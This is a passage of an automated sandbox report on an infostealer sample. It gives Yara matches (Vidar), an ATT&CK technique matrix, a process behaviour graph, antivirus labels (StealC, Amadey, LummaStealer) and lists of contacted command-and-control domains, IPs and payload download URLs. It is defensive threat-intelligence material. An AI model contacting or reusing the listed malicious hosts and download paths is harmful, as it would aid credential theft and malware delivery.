                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 7356, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 4304, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: 4508a44a11.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 7356, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts21
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		511
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		2
                          Taint Shared Content                          		1
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts12
                          Native API                          		1
                          DLL Side-Loading                          		2
                          Bypass User Account Control                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol41
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job                          		1
                          Create Account                          		1
                          Extra Window Memory Injection                          		5
                          Obfuscated Files or Information                          		Security Account Manager14
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		1
                          Remote Access Software                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron1
                          Scheduled Task/Job                          		212
                          Process Injection                          		22
                          Software Packing                          		NTDS248
                          System Information Discovery                          		Distributed Component Object Model1
                          Email Collection                          		3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchd11
                          Registry Run Keys / Startup Folder                          		1
                          Scheduled Task/Job                          		1
                          DLL Side-Loading                          		LSA Secrets1
                          Network Share Discovery                          		SSH2
                          Clipboard Data                          		114
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                          Registry Run Keys / Startup Folder                          		2
                          Bypass User Account Control                          		Cached Domain Credentials1081
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Extra Window Memory Injection                          		DCSync481
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job13
                          Masquerading                          		Proc Filesystem13
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt481
                          Virtualization/Sandbox Evasion                          		/etc/passwd and /etc/shadow1
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                          Process Injection                          		Network Sniffing1
                          System Owner/User Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574690 Sample: file.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 117 zonedw.sbs 2->117 119 fightlsoser.click 2->119 121 5 other IPs or domains 2->121 153 Suricata IDS alerts for network traffic 2->153 155 Found malware configuration 2->155 157 Malicious sample detected (through community Yara rule) 2->157 159 17 other signatures 2->159 9 skotes.exe 3 46 2->9         started        14 file.exe 5 2->14         started        16 skotes.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 137 185.215.113.16, 49789, 49814, 49840 WHOLESALECONNECTIONSNL Portugal 9->137 101 C:\Users\user\AppData\Local\...\4ZD5C3i.exe, PE32 9->101 dropped 103 C:\Users\user\AppData\...\e614d88998.exe, PE32 9->103 dropped 105 C:\Users\user\AppData\...\bab5c1b6a6.exe, PE32 9->105 dropped 111 15 other malicious files 9->111 dropped 187 Creates multiple autostart registry keys 9->187 189 Hides threads from debuggers 9->189 191 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->191 20 4ZD5C3i.exe 9->20         started        25 b6866cbf49.exe 9->25         started        27 4508a44a11.exe 33 9->27         started        37 6 other processes 9->37 107 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->107 dropped 109 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->109 dropped 193 Detected unpacking (changes PE section rights) 14->193 195 Tries to evade debugger and weak emulator (self modifying code) 14->195 197 Tries to detect virtualization through RDTSC time measurements 14->197 199 Potentially malicious time measurement code found 14->199 29 skotes.exe 14->29         started        201 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->201 203 Binary is likely a compiled AutoIt script file 18->203 31 firefox.exe 18->31         started        33 taskkill.exe 18->33         started        35 taskkill.exe 18->35         started        file6 signatures7 process8 dnsIp9 123 192.168.2.100 unknown unknown 20->123 125 192.168.2.101 unknown unknown 20->125 133 92 other IPs or domains 20->133 83 NTUSER.DAT{53b39e8...33F86}.GURAM (copy), data 20->83 dropped 95 105 other files (97 malicious) 20->95 dropped 161 Connects to many different private IPs via SMB (likely to spread or exploit) 20->161 163 Connects to many different private IPs (likely to spread or exploit) 20->163 177 3 other signatures 20->177 127 185.215.113.206, 49848, 80 WHOLESALECONNECTIONSNL Portugal 25->127 85 C:\Users\user\Documents\JEBGCBAFCG.exe, PE32 25->85 dropped 87 C:\Users\user\AppData\...\softokn3[1].dll, PE32 25->87 dropped 89 C:\Users\user\AppData\Local\...\random[3].exe, PE32 25->89 dropped 97 11 other files (3 malicious) 25->97 dropped 165 Detected unpacking (changes PE section rights) 25->165 167 Drops PE files to the document folder of the user 25->167 179 9 other signatures 25->179 39 chrome.exe 25->39         started        169 Multi AV Scanner detection for dropped file 27->169 171 Detected unpacking (overwrites its own PE header) 27->171 173 Attempt to bypass Chrome Application-Bound Encryption 27->173 181 4 other signatures 27->181 42 chrome.exe 27->42         started        183 3 other signatures 29->183 129 prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216, 443, 49847 GOOGLEUS United States 31->129 56 2 other processes 31->56 44 conhost.exe 33->44         started        46 conhost.exe 35->46         started        131 fightlsoser.click 104.21.35.43 CLOUDFLARENETUS United States 37->131 91 C:\Users\user\AppData\Local\Temp\...\file.bin, Zip 37->91 dropped 93 C:\Users\user\...\fuckingdllENCR[1].dll, data 37->93 dropped 99 2 other files (none is malicious) 37->99 dropped 175 Query firmware table information (likely to detect VMs) 37->175 185 7 other signatures 37->185 48 cmd.exe 37->48         started        52 e614d88998.exe 37->52         started        54 taskkill.exe 37->54         started        58 6 other processes 37->58 file10 signatures11 process12 dnsIp13 135 239.255.255.250 unknown Reserved 39->135 60 chrome.exe 39->60         started        81 C:\Users\user\AppData\...\file.zip (copy), Zip 48->81 dropped 143 Writes many files with high entropy 48->143 63 7z.exe 48->63         started        67 7z.exe 48->67         started        79 2 other processes 48->79 145 Query firmware table information (likely to detect VMs) 52->145 147 Tries to harvest and steal ftp login credentials 52->147 149 Tries to harvest and steal browser information (history, passwords, etc) 52->149 151 Tries to steal Crypto Currency Wallets 52->151 69 conhost.exe 54->69         started        71 conhost.exe 58->71         started        73 conhost.exe 58->73         started        75 conhost.exe 58->75         started        77 conhost.exe 58->77         started        file14 signatures15 process16 dnsIp17 139 www.google.com 142.250.181.132 GOOGLEUS United States 60->139 113 C:\Users\user\AppData\Local\...\file_7.zip, Zip 63->113 dropped 141 Writes many files with high entropy 63->141 115 C:\Users\user\AppData\Local\...\file_6.zip, Zip 67->115 dropped file18 signatures19

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe58%ReversingLabsWin32.Infostealer.Tinba
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe67%ReversingLabsWin32.Trojan.StealC
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe66%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe58%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe68%ReversingLabsWin32.Trojan.Mikey
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe71%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe67%ReversingLabsWin32.Trojan.StealC
                          C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe68%ReversingLabsWin32.Trojan.Mikey
                          C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe66%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe71%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe58%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                          C:\Users\user\Documents\JEBGCBAFCG.exe58%ReversingLabsWin32.Infostealer.Tinba

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          prod.classify-client.prod.webservices.mozgcp.net
                          		35.190.72.216
                          		truefalse
                            t.me
                            		149.154.167.99
                            		truefalse
                              www.google.com
                              		142.250.181.132
                              		truefalse
                                fightlsoser.click
                                		104.21.35.43
                                		truetrue
                                  iplogger.co
                                  		104.21.82.93
                                  		truefalse
                                    zonedw.sbs
                                    		116.203.10.31
                                    		truetrue
                                      drive-connect.cyou
                                      		172.67.139.78
                                      		truetrue

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        dare-curbys.biztrue
                                          https://fightlsoser.click/apitrue
                                            http://185.215.113.206/true
                                              https://drive-connect.cyou/apitrue
                                                formy-spill.biztrue
                                                  http://185.215.113.206/68b591d6548ec281/nss3.dlltrue
                                                    http://185.215.113.206/68b591d6548ec281/vcruntime140.dlltrue
                                                      http://185.215.113.206/68b591d6548ec281/sqlite3.dlltrue
                                                        dwell-exclaim.biztrue

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://screenshots.firefox.com/shims/mochitest-shim-2.js/shims/mochitest-shim-2.jsgooglefirefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://duckduckgo.com/chrome_newtab4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://youtube.comZfirefox.exe, 00000018.00000002.3771627553.000027D1BD800000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                  https://duckduckgo.com/ac/?q=4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_lfirefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsfirefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              https://merino.services.mozilla.com/api/v1/suggestfirefox.exe, 00000018.00000002.2811533571.000001C7A16D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311A72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protectfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                  https://spocs.getpocket.com/spocsfirefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://screenshots.firefox.comfirefox.exe, 00000018.00000002.3157826140.000001C7AF688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://zonedw.sbs/kV=I4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://completion.amazon.com/search/complete?q=firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-reportfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                            https://ads.stickyadstv.com/firefox-etpfirefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B2506000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B2509000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1AEE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2621000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B250E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tabfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                https://monitor.firefox.com/breach-details/firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                  https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServicefirefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://zonedw.sbs/yV4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEMfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                        https://xhr.spec.whatwg.org/#sync-warningfirefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          http://80.82.65.70/dll/download&09be480dc7.exe, 00000024.00000002.4217329063.00000000055C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000018.00000002.3070093790.000001C7AD726000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586899171.000001C7B115A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2579118375.000001C7B0F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://profiler.firefox.com/firefox.exe, 00000018.00000002.3157826140.000001C7AF670000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                https://www.msn.comfirefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  http://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInternal/this._finalizePromisefirefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Nofirefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://github.com/mozilla-services/screenshotsfirefox.exe, 00000018.00000003.2586558743.000001C7B111F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3279856715.000001C7B1470000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2586899171.000001C7B115A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2579118375.000001C7B0F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://services.addons.mozilla.org/api/v4/addons/addon/firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                          https://tracking-protection-issues.herokuapp.com/newfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                            http://exslt.org/setsfirefox.exe, 00000018.00000002.2876308896.000001C7ACD26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-reportfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                https://youtube.com/firefox.exe, 00000018.00000002.3523724049.000001C7B3B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc944508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    https://zonedw.sbs/WV)I4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_PROXY_RESPONSE_HEADERbrowserWouldUpgrfirefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingfirefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                            https://api.accounts.firefox.com/v1firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                              http://exslt.org/commonfirefox.exe, 00000018.00000002.2876308896.000001C7ACD26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://fightlsoser.click:443/api6f9ea40b81.exe, 00000008.00000002.3716582556.000000000116C000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3641190528.000000000116C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                    https://fpn.firefox.comfirefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2908490881.000001C7ACEF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      https://www.widevine.com/firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpfalse
